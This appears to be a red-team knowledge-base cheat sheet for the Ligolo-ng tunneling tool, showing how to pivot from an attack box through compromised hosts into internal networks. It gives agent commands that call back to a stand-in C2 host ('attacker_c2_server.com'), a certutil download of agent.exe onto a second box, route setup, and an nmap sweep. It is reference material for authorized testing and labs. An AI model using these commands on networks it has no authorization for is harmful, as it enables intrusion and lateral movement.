Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / PIVOTING / TUNNELING

Ligolo

Prerequisites

Linux

Create a TUN interface on the proxy (attack) server:

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

On Ligolo-ng >= v0.6, you can let Ligolo create the interface:

interface_create --name "evil-cha"

Windows

Download the Wintun driver (used by WireGuard) and place wintun.dll in the same folder as Ligolo.
Make sure the architecture (32/64-bit) matches.

Quickstart Flow

1. Start Proxy (Kali / C2)

sudo ./proxy -selfcert   # Use self-signed certificates

interface_create --name "evil-cha"

2. Start Agent (Pivot Host)

# Basic connect
./agent -connect attacker_c2_server.com:11601

# Ignore certificate validation (lab only)
./agent -connect attacker_c2_server.com:11601 -ignore-cert

# Using IP + fingerprint (recommended with selfcert)
./agent -connect 10.10.14.207:11601 -v -accept-fingerprint <FINGERPRINT>

# Lab/debugging: ignore all certificate checks
./agent -connect 10.10.14.207:11601 -v -ignore-cert

3. Select Session on Proxy

ligolo-ng » session

Pick the agent you want to pivot through.

4. Start Tunnel Interface

tunnel_start --tun evil-cha

5. Add Routes via Tunnel

interface_add_route --name evil-cha --route 192.168.2.0/24

Now you can route traffic from your attack box to 192.168.2.0/24 via the Ligolo tunnel.

6. Session A > Remote Listener

# EXPOSE PIVOT HUB
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# EXPOSE KALI SERVER
listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000 --tcp

7. Box B > Connect to Main

# RETRIEVE BINARY
certutil -urlcache -f -split http://BOX_A_IP:8000/windows/agent.exe

./agent -connect Box_A:11601 -ignore-cert

8. Create New Interface for Session B

9. Tunnel > etc

nmap -sS -F 172.16.8.0/24 -v -Pn --disable-arp-ping

TLS Options

Using Let's Encrypt (-autocert)

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 must be accessible for Let's Encrypt HTTP validation.

Using Custom Certificates (-certfile / -keyfile)

You can specify your own TLS certificate and key for the proxy:

./proxy -certfile server.crt -keyfile server.key

Self-Signed Certificates (-selfcert)

The proxy/relay can automatically generate self-signed certificates:

./proxy -selfcert

Validating Self-Signed Fingerprint (recommended)

ligolo-ng » certificate_fingerprint
# INFO[0203] TLS Certificate fingerprint for ligolo is: D005527D2683A8F2DB73022FBF23188E064493CFA17D6FCF257E14F4B692E0FC

Then connect the agent with:

ligolo-agent -connect 127.0.0.1:11601 -v -accept-fingerprint D005527D2683A8F2DB73022FBF23188E064493CFA17D6FCF257E14F4B692E0FC

Ignoring All Certificate Verification (lab/debug only)

./agent -connect 127.0.0.1:11601 -v -ignore-cert

Beware of MITM attacks. This should only be used in test labs or for debugging.